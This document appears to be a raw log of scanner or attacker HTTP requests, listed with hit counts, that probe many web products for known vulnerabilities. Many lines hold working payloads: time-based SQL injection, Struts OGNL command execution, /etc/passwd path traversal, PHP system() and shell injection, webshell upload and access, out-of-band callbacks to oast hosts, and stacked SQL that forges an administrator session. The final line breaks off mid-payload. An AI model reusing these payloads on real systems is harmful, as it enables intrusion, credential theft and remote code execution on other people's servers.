413	4	GET /bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fbin%252Fregister%252FXWiki%252FXWikiRegister%253Fxredirect%253D%25252Fxwiki%25252Fbin%25252Fview%25252FScheduler%25252F%25253Fdo%25253Dtrigger%252526which%25253DScheduler.NotificationEmailDailySender HTTP/1.1
414	4	POST /bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender HTTP/1.1
415	4	GET /xwiki/bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fbin%252Fregister%252FXWiki%252FXWikiRegister%253Fxredirect%253D%25252Fxwiki%25252Fbin%25252Fview%25252FScheduler%25252F%25253Fdo%25253Dtrigger%252526which%25253DScheduler.NotificationEmailDailySender HTTP/1.1
416	4	POST /xwiki/bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender HTTP/1.1
417	4	POST /wp-admin/admin-post.php HTTP/1.1
418	4	GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1
419	4	GET /backend/settings/oauth_adfs?hostname=polar HTTP/1.1
420	4	GET /wp-json/wp/v2/give_forms/ HTTP/1.1
421	4	GET /users;. HTTP/1.1
422	4	GET /wp-content/plugins/cz-loan-management/README.txt HTTP/1.1
423	4	GET /?wc-api=payplus_gateway&status_code=true&more_info=(select*from(select(sleep(6)))a) HTTP/1.1
424	4	GET /internal/v2/config/mps_secret/ADM_SESSIONID HTTP/1.1
425	4	GET /global-protect/portal/images/2xHOcvCMsM8TDiGeeRFcKo3tkia.txt HTTP/1.1
427	4	POST /bsh.servlet.BshServlet HTTP/1.1
428	4	POST /index.php?s=/home/page/uploadImg HTTP/1.1
429	4	POST /axis2-admin/login HTTP/1.1
430	4	POST /seeyon/htmlofficeservlet HTTP/1.1
431	4	POST /user.action HTTP/1.1
432	4	GET /cgi-bin/test-cgi HTTP/1.1
433	4	GET /cgi-bin/test.cgi HTTP/1.1
434	4	GET /cgi-bin/status HTTP/1.1
435	4	GET /cgi-bin/status/status.cgi HTTP/1.1
436	4	POST /postlocal HTTP/1.1
437	4	POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
438	4	POST /axis2/axis2-admin/login HTTP/1.1
439	4	POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
440	4	POST /cgi-bin/rpc HTTP/1.1
441	4	GET /users/sign_in HTTP/1.1
442	4	POST /webadmin/auth/verification.php HTTP/1.1
443	4	POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId HTTP/1.1
444	4	GET /progs/homepage HTTP/1.1
445	4	POST /apps/zxtm/wizard.fcgi?error=1&section=Access+Management%3ALocalUsers HTTP/1.1
446	4	POST /index.php?action=porte_plume_previsu HTTP/1.1
447	4	POST /api/v0/train HTTP/1.1
448	4	GET /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1
450	4	POST /arrow.flight.protocol.FlightService/DoPut HTTP/1.1
451	4	GET /index.php?rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={\x22__file\x22:\x22/etc%2fpasswd\x22} HTTP/1.1
452	4	GET /wp-content/plugins/essential-blocks/readme.txt HTTP/1.1
454	4	GET /login?next=/ HTTP/1.1
455	4	POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1
456	4	POST /cgi/getParm HTTP/1.1
458	4	POST /node_modules/angular-base64-upload/demo/server.php HTTP/1.1
459	4	POST /bower_components/angular-base64-upload/demo/server.php HTTP/1.1
460	4	GET /zm/index.php?sort=if(now()=sysdate()%2Csleep(6)%2C0)&order=desc&limit=20&view=request&request=watch&mid=1 HTTP/1.1
463	4	GET /WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f=2259 HTTP/1.1
464	4	POST /geoserver/wfs HTTP/1.1
465	4	GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<\x22+UNION+SELECT+SLEEP(6);–+-&type=c&response=accept HTTP/1.1
466	4	POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
467	4	POST /api/ HTTP/1.1
471	4	POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1
473	4	POST /api/push HTTP/1.1
474	4	POST /webtools/control/main/ProgramExport HTTP/1.1
475	4	POST /api/pull HTTP/1.1
477	4	GET /admin/login/index.php HTTP/1.1
478	4	POST /html/ad/adfilestorage/request/checkAcesso.php HTTP/1.1
479	4	POST /webtools/control/view/StatsSinceStart HTTP/1.1
480	4	GET /solr/admin/info/properties:/admin/info/key HTTP/1.1
481	4	POST /Token HTTP/1.1
482	4	GET /asispanel/ HTTP/1.1
484	4	GET /?es=optin&hash=eyJtZXNzYWdlX2lkIjowLCJjYW1wYWlnbl9pZCI6MCwiY29udGFjdF9pZCI6Int7Y29udGFjdF9pZH19IiwiZW1haWwiOiJ7e2VtYWlsfX0iLCJndWlkIjoiZGlid29sLXFhaWViZC1xdnJna3AtbGh5b3BtLXJteWZ6byIsImxpc3RfaWRzIjpbInNsZWVwKDMpIl0sImFjdGlvbiI6InN1YnNjcmliZSJ9 HTTP/1.1
485	4	POST /drag/onlDragDatasetHead/getTotalData HTTP/1.1
486	4	GET /login.do?jvar_page_title=HTTP/1.1
487	4	POST /php/components/logs.php HTTP/1.1
488	4	POST /NmAPI/RecurringReport HTTP/1.1
489	4	POST /business-directory/?dosrch=1&q&wpbdp_view=search&listingfields[+or+sleep(if(1%3d1,6,0))+))–+-][1] HTTP/1.1
491	4	POST /index.php?rest_route=/wqc/v1/query HTTP/1.1
492	4	GET /wp-content/plugins/dokan-pro/changelog.txt HTTP/1.1
493	4	POST /client/api?command=samlSso HTTP/1.1
494	4	POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/1.1
495	4	POST /mdm/serverurl HTTP/1.1
496	4	POST /tracking/client_1/get-resource HTTP/1.1
497	4	POST /lshw?osVer=a&osCode=b&osKernel=c&agentVersion=e&serial=f HTTP/1.1
498	4	GET /console/dashboard/executorCount?zkClusterKey=1%27-extractvalue(1,concat(0x0a,version()))–%20- HTTP/1.1
499	4	GET /images/index.html?id=%24%7B%40print_r%28%40system%28%22cat+/etc/passwd%22%29%29%7D HTTP/1.1
500	4	GET /images/index.html?id=%24%7B%40print_r%28%40system%28%22id%22%29%29%7D HTTP/1.1
501	4	POST /tracking/client_1/read-instruction HTTP/1.1
502	4	POST /portal/loginpage.aspx HTTP/1.1
503	4	GET /api/data HTTP/1.1
507	4	GET /streampipes-backend/api/v2/auth/settings HTTP/1.1
508	4	GET /desktop,/cgi-bin/remote_help-cgi/favicon.ico?type=sshd_tdc HTTP/1.1
509	4	POST /cmd,/simZysh/register_main/setCookie HTTP/1.1
511	4	GET /userLogin.asp HTTP/1.1
512	4	GET /file=web_assets/../config.json HTTP/1.1
513	4	GET /WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f=0313 HTTP/1.1
515	4	GET /index.php?p=admin/actions/assets/generate-transform HTTP/1.1
516	4	POST /menu.php HTTP/1.1
518	4	POST /commandcenter/deployWebpackage.do HTTP/1.1
519	4	GET /cache_public/sh.phtml HTTP/1.1
520	4	GET /index.php/Home/login/index.html HTTP/1.1
521	4	GET /cache_public/sh.php HTTP/1.1
522	4	POST /mdm/checkin HTTP/1.1
523	4	POST /apriso/portal/kiosk/querylogin.aspx HTTP/1.1
524	4	POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
525	4	GET /global-protect/portal/images/2xHOXS78UBBO1Ca7K5mPkurUKvg.txt HTTP/1.1
526	4	POST /ssl-vpn/hipreport.esp HTTP/1.1
527	4	POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1
528	4	GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage HTTP/1.1
529	4	GET /?__kubio-site-edit-iframe-preview=1&__kubio-site-edit-iframe-classic-template=../../../../../../../../etc/passwd HTTP/1.1
530	4	GET /membership-registration/ HTTP/1.1
531	4	POST /mesh/servlet/mesh.webadmin.MESHAdminServlet?requestedAction=login HTTP/1.1
532	4	GET /account/?user=1&tab=groups&group-name=p%27+or+%27%%27=%27%%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat(%22Database:%22,md5(999999999),0x7c,%20%22Version:%22,version()),13–+- HTTP/1.1
533	4	POST /app/sys1.php HTTP/1.1
534	4	GET /index.php?m=default&c=user&a=register&u=0 HTTP/1.1
535	4	GET /simpleeditor/common/commonReleaseNotes.do HTTP/1.1
536	4	POST /modules/miniform/ajax_delete_message.php HTTP/1.1
537	4	POST /rest/xxxxxxxxxxxxxxx/xxxxxxx?executeAsync HTTP/1.1
538	4	GET /app?service=page/PrinterList HTTP/1.1
539	4	POST /mailingupgrade.php HTTP/1.1
540	4	POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1
541	4	POST /api/authentication/login HTTP/1.1
542	4	GET /webadmin/out HTTP/1.1
543	4	POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
544	4	POST /mifs/.;/services/LogService HTTP/1.1
545	4	POST /adxmlrpc.php HTTP/1.1
546	4	POST /cgi-bin/system_log.cgi HTTP/1.1
547	4	POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1
548	4	POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1
549	4	POST /var HTTP/1.1
550	4	POST /context.json HTTP/1.1
551	4	POST /ui/api/v1/ui/auth/login HTTP/1.1
552	4	GET /?pum_action=tools_page_tab_system_info HTTP/1.1
553	4	POST /admin/auth/reset-password HTTP/1.1
554	4	POST /servlet/UploadServlet HTTP/1.1
555	4	POST /rest/tinymce/1/macro/preview HTTP/1.1
556	4	POST /photo/p/api/album.php HTTP/1.1
557	4	GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1
558	4	POST /service/extdirect HTTP/1.1
559	4	POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
560	4	POST /_async/AsyncResponseService HTTP/1.1
561	4	POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1
562	4	GET /_async/favicon.ico HTTP/1.1
563	4	POST /mdm/client/v1/mdmLogUploader?udid=si%5C..%5C..%5C..%5Cwebapps%5CDesktopCentral%5C_chart&filename=logger.zip HTTP/1.1
564	4	GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1
565	4	GET /author-sitemap.xml HTTP/1.1
566	4	POST /jeecg-boot/jmreport/show HTTP/1.1
567	4	GET /hoteldruid/inizio.php HTTP/1.1
568	4	POST /wms HTTP/1.1
569	4	POST /api/timelion/run HTTP/1.1
570	4	GET /fuel/login/ HTTP/1.1
571	4	POST /fuel/login/ HTTP/1.1
572	4	GET /tiki-index.php HTTP/1.1
573	4	POST /pig/add-pig.php HTTP/1.1
574	4	GET /file-manager/ HTTP/1.1
575	4	POST /file-manager/backend/makefile HTTP/1.1
576	4	POST /file-manager/backend/text HTTP/1.1
577	4	POST /CFIDE/adminapi/base.cfc?method HTTP/1.1
578	4	POST /login.htm HTTP/1.1
579	4	GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1
580	4	GET /ext-js/index.html HTTP/1.1
581	4	POST /auth/newpassword HTTP/1.1
582	4	GET /ebook/bookPerPub.php?pubid=4’ HTTP/1.1
583	4	GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1
584	4	GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
585	4	POST /dfsms/ HTTP/1.1
586	4	GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1
587	4	POST /cgi-bin/libagent.cgi?type=J HTTP/1.1
588	4	GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1
589	4	GET /modules/leocustomajax/leoajax.php?cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1
590	4	GET /app?service=page/SetupCompleted HTTP/1.1
591	4	POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
593	4	GET /jeecg-boot/sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1
594	4	GET /sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1
595	4	GET /sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1
596	4	GET /jeecg-boot/sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1
597	4	GET /fuel/pages/items/?search_term&published&layout&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1
598	4	POST /EemAdminService/EemAdmin HTTP/1.1
599	4	POST /cgi-bin/system_mgr.cgi HTTP/1.1
600	4	POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl HTTP/1.1
601	4	POST /convert HTTP/1.1
602	4	POST /goform/setSysAdm HTTP/1.1
603	4	POST /assets/php/upload.php HTTP/1.1
604	4	POST /actions/authenticate.php HTTP/1.1
605	4	POST /auth/check HTTP/1.1
606	4	POST /incom/modules/uploader/showcase/script.php HTTP/1.1
607	4	GET /graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=%22or+%22%22%3D%22%28%28%22%29%29%3BSELECT+SLEEP%2810%29%3B–+- HTTP/1.1
608	4	GET /nagiosxi/index.php/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(SELECT+CASE+WHEN+1=1+THEN+sleep(5)+ELSE+sleep(0)+END+) HTTP/1.1
609	4	GET /WebInterface HTTP/1.1
610	4	POST /?gf_page=upload HTTP/1.1
611	4	POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
612	4	GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\x22;user
613	4	POST /integration/saveGangster.action HTTP/1.1
614	4	GET /hw-sys.htm HTTP/1.1
615	4	POST /invoker/JMXInvokerServlet/ HTTP/1.1
616	4	GET /zabbix.php HTTP/1.1
617	4	POST /invoker/readonly HTTP/1.1
619	4	GET /cgi-bin/stats HTTP/1.1
620	4	GET /users HTTP/1.1
621	4	POST /cgi/getGDPRParm HTTP/1.1
622	4	POST /system/sharedir.php HTTP/1.1
623	4	POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1
624	4	POST /en/php/usb_sync.php HTTP/1.1
625	4	GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1
626	4	POST /invoker/EJBInvokerServlet/ HTTP/1.1
627	4	GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1
628	4	GET /api/login/unlockGetData HTTP/1.1
630	4	POST /api/login/ HTTP/1.1
631	4	GET /cgi-bin/test HTTP/1.1
632	4	GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{‘sh’,’-c’,‘id’})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
633	4	GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{‘sh’,’-c’,‘id’})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
634	4	GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
635	4	POST /nagiosxi/login.php HTTP/1.1
636	4	GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
637	4	GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{‘sh’,’-c’,‘id’})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
638	4	GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{‘sh’,’-c’,‘id’})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
639	4	GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
640	4	GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{‘sh’,’-c’,‘id’})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
641	4	GET /?gf_page=upload HTTP/1.1
642	4	GET /images/logo/logo-eoffice.php HTTP/1.1
643	4	GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d HTTP/1.1
644	4	POST /zentao/user-login.html HTTP/1.1
645	4	GET /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{‘sh’,’-c’,‘id’})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
646	4	POST /modules/attributewizardpro/file_upload.php HTTP/1.1
647	4	POST /filemanager/upload.php HTTP/1.1
648	4	POST /crowd/admin/uploadplugin.action HTTP/1.1
649	4	GET /crowd/plugins/servlet/exp HTTP/1.1
650	4	POST /Collector/diagnostics/ping HTTP/1.1
651	4	POST /Collector/diagnostics/trace_route HTTP/1.1
652	4	GET /wan.htm HTTP/1.1
653	4	POST /password_change.cgi HTTP/1.1
654	4	GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
655	4	GET /wp-content/plugins/visualizer/readme.txt HTTP/1.1
656	4	POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1
657	4	GET /BSW_cxttongr.htm HTTP/1.1
658	4	POST /modules/Rubrics/rubrics_visualise_saveAjax.php HTTP/1.1
659	4	GET /wp-content/plugins/media-library-assistant/readme.txt HTTP/1.1
660	4	POST /file-manager/backend/permissions HTTP/1.1
661	4	GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\x22%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL–%20aa HTTP/1.1
662	4	GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1
663	4	GET /zabbix/zabbix.php HTTP/1.1
664	4	POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1
665	4	POST /web/google_analytics.php HTTP/1.1
666	4	GET /cgi-bin/cstecgi.cgi HTTP/1.1
667	4	GET /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=echo%20system(\x22ipconfig\x22); HTTP/1.1
668	4	POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
669	4	GET /tutor/filter?searched_word&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0 HTTP/1.1
670	4	GET /api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23 HTTP/1.1
671	4	POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1
672	4	GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1
673	4	POST /cgi-bin/file_transfer.cgi HTTP/1.1
674	4	POST /php/upload.php HTTP/1.1
675	4	POST /index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails HTTP/1.1
676	4	POST /wp-admin/options-general.php?page=smartcode HTTP/1.1
677	4	POST /ws_utc/resources/setting/options HTTP/1.1
678	4	POST /ws_utc/resources/setting/keystore HTTP/1.1
679	4	POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
680	4	POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1
681	4	GET /test.cgi HTTP/1.1
682	4	GET /test.txt HTTP/1.1
683	4	POST /soap.cgi?service=whatever-control;curl HTTP/1.1
686	3	POST /ccms/index.php HTTP/1.1
705	2	GET /wp-content/plugins/wp-file-upload/wfu_file_downloader.php?file=BBYAQac4CJN36wEu&ticket=bWD0shkbtPHRBxQU&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_ohaUgZlFpDXlf1khNiMnauKoZlohmVBC HTTP/1.1
706	2	POST /wp-admin/admin-ajax.php?+config-create+/&/+/tmp/2xHOXXW1xqQkOJ6CkADjaLHT7Zc.php HTTP/1.1
707	2	POST /wp-admin/admin-ajax.php?0=MnhIT1hhSGx5SFVGSHhUMDlHQ1ZpVEREd1Bv HTTP/1.1
712	2	GET /fileserver/2xHOXc8rJzZ0QlQwbVUpiwQQNpH.txt HTTP/1.1
713	2	GET /debugging_center_utils_.php?log=;echo%20sbgdyaylisfsevahpzbwkmqyoafhawks%20
714	2	GET /debugging_center_utils_.php?log=;echo%20sbgdyaylisfsevahpzbwkmqyoafhawks%20
716	2	POST /models?url=http%3a//d0l23ge3tjmd51ltm35goisxkdpy6hj6d.oast.pro HTTP/1.1
717	2	GET /v2arI/CVE-2023-47246.txt?true HTTP/1.1
718	2	GET /home/xbteh.php HTTP/1.1
719	2	GET /wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://d0l235hfbd6ifhi9kb1gff9hgwpp3g53c.oast.live/patrowl.svg HTTP/1.1
731	2	GET /seeyon/test123456.jsp?pwd=asasd3344&2xHOXRqDtQDJlaapvbDUHTjE5Hd=ipconfig HTTP/1.1
732	2	GET /include/ghxn.txt HTTP/1.1
733	2	GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d6e68495431686c4d7a5a344e3031744d56424c5347316f5345464a5445744e5a56464722207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1
734	2	PUT /_users/org.couchdb.user:poc HTTP/1.1
736	2	GET /api/cors/http:%2f%2fnextchat.d0l235hfbd6ifhi9kb1gmhbr9tg687cg9.oast.live%23 HTTP/1.1
737	2	GET /_images/qDPhNj HTTP/1.1
738	2	PATCH /mgmt/tm/auth/user/fJFO7 HTTP/1.1
739	2	POST /tmui/login.jsp HTTP/1.1
740	2	GET /2xHOcwo3jsu67HL4dR6CeStd9sJ.jsp HTTP/1.1
741	2	GET /OKNy9enL2Y.php HTTP/1.1
744	2	GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2xHOXTOqeMdfLAZiy5UGLNd9DwB.jsp HTTP/1.1
745	2	GET /Uploads/2xHOXTFM5PrnN7fApp7Nk7PGYT4.php7 HTTP/1.1
747	2	GET /webadmin/script?command=
748	2	GET /debugging_center_utils_.php?log=;echo%20ponfxcytowyspbedwlzorgetfeivmllm%20
749	2	GET /debugging_center_utils_.php?log=;echo%20ponfxcytowyspbedwlzorgetfeivmllm%20
752	2	POST /management/export.php?filename=$(echo+’’+>+axworryyxbaw.php)&type=pdf HTTP/1.1
753	2	GET /WY3pv1.txt?true HTTP/1.1
754	2	GET /CC09WQTfJ4.php HTTP/1.1
755	2	GET /wp-json/lp/v1/load_content_via_ajax/?callback={\x22class\x22%3a\x22LP_Debug\x22,\x22method\x22%3a\x22var_dump\x22}&args=\x222xHOXZX3OGwDMpg0oSjVPxOhBpo\x22 HTTP/1.1
756	2	GET /model-versions/get-artifact?path=random&name=OkWpWb&version=2 HTTP/1.1
757	2	POST /human.aspx?Username=SQL%27%3BINSERT+INTO+activesessions+(SessionID)+values+(%272xHOdATq4OFd4vbqu3GjR9cM47p%27);UPDATE+activesessions+SET+Username=(select+Username+from+users+order+by+permission+desc+limit+1)+WHERE+SessionID=%272xHOdATq4OFd4vbqu3GjR9cM47p%27;UPDATE+activesessions+SET+LoginName=%27test@test.com%27+WHERE+SessionID=%272xHOdATq4OFd4vbqu3GjR9cM47p%27;UPDATE+activesessions+SET+RealName=%27test@test.com%27+WHERE+SessionID=%272xHOdATq4OFd4vbqu3GjR9cM47p%27;UPDATE+activesessions+SET+InstId=%271234%27+WHERE+SessionID=%272xHOdATq4OFd4vbqu3GjR9cM47p%27;UPDATE+activesessions+SET+IpAddress=%27204.216.147.144%27+WHERE+SessionID=%272xHOdATq4OFd4vbqu3GjR9cM47p%27;UPDATE+activesessions+SET+LastTouch=%272099-06-10+09:30:00%27+WHERE+SessionID=%272xHOdATq4OFd4vbqu3GjR9cM47p%27;UPDATE+activesessions+SET+DMZInterface=%2710%27+WHERE+SessionID=%272xHOdATq4OFd4vbqu3GjR9cM47p%27;UPDATE+activesessions+SET+Timeout=%2760%27+WHERE+SessionID=%272xHOdATq4OFd4vbqu3GjR9cM47p%27;UPDATE+activesessions+SET+ResilNode=%2710%27+WHERE+SessionID=%